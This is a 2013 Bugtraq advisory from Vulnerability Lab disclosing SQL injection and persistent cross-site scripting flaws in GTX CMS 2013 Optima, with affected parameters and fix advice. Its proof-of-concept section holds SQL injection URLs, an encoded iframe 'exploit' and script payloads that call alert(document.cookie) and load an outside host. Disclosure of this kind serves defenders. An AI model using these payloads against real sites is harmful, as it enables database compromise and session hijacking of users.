[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: GTX CMS 2013 Optima - Multiple Web Vulnerabilities
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2013-10-29 14:05:59
Message-ID: 526FC0C7.7010303 () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
===============
GTX CMS 2013 Optima - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1124
Release Date:
=============
2013-10-29
Vulnerability Laboratory ID (VL-ID):
====================================
1124
Common Vulnerability Scoring System:
====================================
7.2
Product & Service Introduction:
===============================
We provide you with the perfect community GTX CMS software solution - making it ready \
to meet your needs and requirements and tailored to your corporate design! The \
complete setup of your individual interactive community portal or your website is \
done by us, so you can get started right away!
GTX CMS is extremely flexible and can be operated as a closed community (eg parallel \
to your existing website) and as a normal website with a closed member.Datails, \
refer to the section `About GTX CMS`.
(Copy of the Vendor Homepage: http://www.gtx-cms.de/ )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in \
the official GTX Content Management System 2013 web application.
Vulnerability Disclosure Timeline:
==================================
2013-10-29: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
OBM-Media e.K.
Product: GTX CMS - Web Application Basic, Standard and Optima
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
1.1
Multiple remote sql injection web vulnerabilities are detected in the official GTX \
Content Management System 2013 web application. The vulnerability allows remote \
attackers to unauthorized inject own sql commands to compromise the web-application \
or the web-server dbms.
The sql injection vulnerabilities are located in the vulnerable `objId` and `modId` \
values of the tagSearchTag module. Remote attackers are able to inject own sql \
commands via GET method request to compromise the database management system or cms \
web-application. The inject can be done by usage of the executable ajax path via GET \
method request or by usage of the objId in the tagSearchTag module POST method \
request. The severity of the remote sql injection bugs is estimated as high.
Exploitation of the remote sql injection web vulnerability requires no user \
interaction and a low privileged web-application user account. Successful \
exploitation of the remote sql injection bug results in database management system \
and cms or web-application compromise.
Vulnerable Module(s):
[+] ajax
Vulnerable File(s):
[+] tagSearchTag
Vulnerable Parameter(s):
[+] objId
[+] modId
1.2
Multiple persistent input validation web vulnerabilities are detected in the official \
GTX Content Management System 2013 web application. The web vulnerability allows \
remote attackers to inject via POST method own malicious script codes to the online \
service application-side.
The first persistent input validation web vulnerability is located in the ajax \
`tag-searchTag` module and the connected vulnerable q parameter. Remote attackers \
are able to inject own malicious script codes as tag name. The execute occurs in the \
main communication module when an user/admin is processing to review the article or \
comments. Exploitation of the vulnerability requires a low privileged \
web-application user account and only low user interaction (view, no click!).
The secound persistent web vulnerability is located in the `linkverzeichnis` \
(link-directory) add module. Remote attackers are able to inject own malicious \
script codes as `Schlüsselworter` (keywords) in the search. The execute occurs in the \
main link directory module of the web-application. Exploitation of the vulnerability \
requires a low privileged web-application user account and low or medium user \
interaction (click!).
The third persistent web vulnerability is located in the `Ordnerverwaltung` \
(Folder/Path Management) module. Remote attackers are able to manipulate the \
vulnerable `ordner` name value in the add POST method request. The execute occurs in \
the main path of the `persoenliche nachrichten` (private messages) module in the cms \
control panel. Exploitation of the vulnerability requires a low privileged \
web-application user account and medium user interaction (add+click!).
Successful exploitation of the remote vulnerabilities lead to persistent session \
hijacking (customers), account steal via persistent web attacks, persistent \
phishing, persistent redirect to external sources, persistent redirect as file \
downloads or persistent manipulation of affected and connected context.
Vulnerable Module(s):
[+] ajax/tagSearchTag
[+] suche/linkverzeichnis
[+] pers-nachrichten/ordnerverwaltung
Vulnerable Input(s):
[+] Tags
[+] Suche - Linkverzeichnis > Schlüsselwörter - Suchbegriff(e) & Entfernung von
[+] Orderverwaltung - Add
Vulnerable Parameter(s):
[+] q
[+] keywords
[+] ordner
Proof of Concept (PoC):
=======================
1.1
The sql injection web vulnerabilities can be exploited by remote attackers with low \
privileged web application user account and without user interaction. For \
demonstration or to reproduce ...
PoC:
http://gtx-cms.localhost:8080/Ajax/tagSearchTag?q=[TAG(x)]&modId=ptd&objId=37_%20'null[SQL \
INJECTION VULNErABILITY!]-- \
http://gtx-cms.localhost:8080/Ajax/tagSearchTag?q=[TAG(x)]&modId=ptd%20'null[SQL \
INJECTION VULNErABILITY!]--&objId=3
Exploit:
<script type=``text/javascript``>document.write(unescape(``<script \
type=\``text\/javascript\ \
``>document.write\(unescape\(\``%3Chtml%3E%0A%3Chead%3E%3Cbody%3E%0A%3Ctitle%3EGTX%20CMS%20-
%20SQL%20INJECTION%20EXPLOIT%3C/title%3E%0A%3Ciframe%20src%3Dhttp%3A//gtx.localhost
%3A8080/Ajax/tagSearchTag%3Fq%3D%5BTAG%28x%29%5D%26modId%3Dptd%26objId%3D37_%2520%27null
%5BSQL%20INJECTION%20VULNErABILITY%21%5D--%20width%3D%22800%22%20height%3D%22800%22%3E%0A%3C
iframe%20src%3Dhttp%3A//gtx.localhost%3A8080/Ajax/tagSearchTag%3Fq%3D%5BTAG%28x%29%5D%26modId
%3Dptd%2520%27null%5BSQL%20INJECTION%20VULNErABILITY%21%5D--%20width%3D%22800%22%20height%3D
%22800%22%3E%26objId%3Dx%0A%3C/body%3E%3C/head%3E%0A%3C/html%3E%0A%0A\``\)\);<\/script>``));</script>
1.2
The persistent input validation web vulnerabilities can be exploited by remote \
attackers with low privileged web application user accounts and low user \
interaction. For demonstration or to reproduce ...
1.2.1
PoC: Tags in Article or News
<div class=``right``>
<div id=``tagTagsWidget``>
<ul class=``as-selections`` id=``as-selections-049``><li class=``as-selection-item \
blur`` id=``as-selection-002``><a class=``as-close``>×</a>>``<iframe \
src=``GTX-CMS.de%20%20Mitglieder- \
Communities%20f%C3%BCr%20Golfclubs,%20Tennisclubs,%20Vereine,%20Verb%C3%A4nde%20etc.%20-%20auch%20als%20Intranet-CMS%20bestens%20
geeignet%20%C2%BB%20Linkverzeichnis%20%C2%BB%20Link%20hinzuf%C3%BCgen_files/a.htm``></iframe></li><li \
class=``as-original`` id=``as-original-049``><input autocomplete=``off`` \
name=``tags`` id=``as-input-049`` class=``text as-input`` type=``text``> <input \
value=``>``<iframe src=a> >``<iframe src=a>>``<iframe src=a> >``<iframe src=a>>`` \
<iframe src=a> >``<iframe src=a>>``<iframe src=a> >``<iframe src=a>>``<iframe src=a> \
>``<iframe src=a>,>`` <iframe src=http://vuln-lab.com>,`` class=``as-values`` \
> name=``as_values_049`` id=``as-values-049`` type=``hidden``></li></ul>
<div style=``display: none;`` class=``as-results`` id=``as-results-049``></div>
</div>
Inject: Tags
http://gtx-cms.localhost:8080/linkverzeichnis/hinzufuegen
PoC (PATH):
http://gtx-cms.localhost:8080/Ajax/tagSearchTag?q=%3E%22%3Ciframe%20src%3Da%3E%20%3E%22%3Ciframe%20src%3Da%3E&modId=ptd&objId=null
http://gtx-cms.localhost:8080/Ajax/tagSearchTag?q=%3E%22%3Ciframe%20src%3Da%3E%20%3E%22%3Ciframe%20src%3Da%3E%20&modId=ptd&objId=null
http://gtx-cms.localhost:8080/Ajax/tagSearchTag?q=%3E%22%3Ciframe%20src%3Dhttp%3Avuln-lab.com%3E&modId=ptd&objId=null
1.2.2
PoC: Suchbegriff(e) & Entfernung von
<div class=``box``>
<div class=``formItems``>
<div class=``item row1``>
<div class=``left``>
Schlüsselwörter</div><div class=``right``>>``<iframe \
src=``GTX-CMS.de%20%20Mitglieder-Communities%20f%C3%BCr%20Golfclubs, \
%20Tennisclubs,%20Vereine,%20Verb%C3%A4nde%20etc.%20-%20auch%20als%20Intranet-CMS%20bestens%20geeignet%20%C2%BB%20Suche%20%C2%BB%20
Linkverzeichnis%20%C2%BB%20Ergebnisse2_files/a.htm`` \
onload=``alert(document.cookie)`` <=```` div=````> </div>
</div>
</div>
Inject: Suchbegriff(e) & Entfernung von
http://gtx-cms.localhost:8080/linkverzeichnis/hinzufuegen
Output:
Suche - Linkverzeichnis > Schlüsselwörter
http://gtx-cms.localhost:8080/suche/linkverzeichnis
1.2.3
PoC: Ordnerverwaltung - Ordner Name
<li class=``seperator``></li>
<!-- Users folders -->
<li><a class=``icon`` \
href=``/pers-nachrichten/ordner/iframe-srchttpvuln-labcom-onloadalertdocumentcookie- \
iframe-srchttpvuln-labcom-onloadalertdocumentcookie-_1``> <img \
src=``images/icons/Sophistique/files_24.png`` alt=``Ordner``> <span>>``<iframe \
src=``http://vuln-lab.com`` onload=``alert(document.cookie)`` <=`` \
%20%20.``>``<iframe src=http://vuln-lab.com onload=alert(document.cookie) < \
(0)</span> </a></li>
Inject: OrderVerwaltung Add
http://gtx-cms.localhost:8080/pers-nachrichten/ordnerverwaltung
Output: Persönliche Nachrichten
http://gtx-cms.localhost:8080/pers-nachrichten
http://gtx-cms.localhost:8080/pers-nachrichten/ordnerverwaltung
Solution - Fix & Patch:
=======================
1.1
The sql injection web vulnerabilities can be patched by a secure parse and encode of \
the vulnerable `modId` and `objId` values in the tag search module.
1.2
The persistent input validation web vulnerabilities can be patched by a secure parse \
and encode of the vulnerable ordner name, q and keyword parameters.
Encode the output index of the ordner name in the private messages box and connected \
resources. Parse the tag search error output to prevent script code executions.
Security Risk:
==============
1.1
The security risk of the remote sql injection web vulnerabilities are estimated as \
high(+).
1.2
The security risk of the persistent input validation web vulnerabilities are \
estimated as medium(+).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri \
(bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including \
the warranties of merchantability and capability for a particular purpose. \
Vulnerability- Lab or its suppliers are not liable in any case of damage, including \
direct, indirect, incidental, consequential loss of business profits or special \
damages, even if Vulnerability-Lab or its suppliers have been advised of the \
possibility of such damages. Some states do not allow the exclusion or limitation of \
liability for consequential or incidental damages so the foregoing limitation may \
not apply. We do not approve or encourage anybody to break any vendor licenses, \
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - \
www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - \
admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - \
magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - \
vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically \
redistribute this alert in its unmodified form is granted. All other rights, \
including the use of other media, are reserved by Vulnerability-Lab Research Team or \
its suppliers. All pictures, texts, advisories, source code, videos and other \
information on this website is trademark of vulnerability-lab team & the specific \
authors or managers. To record, list (feed), modify, use or edit our material \
contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a \
permission.
Copyright © 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic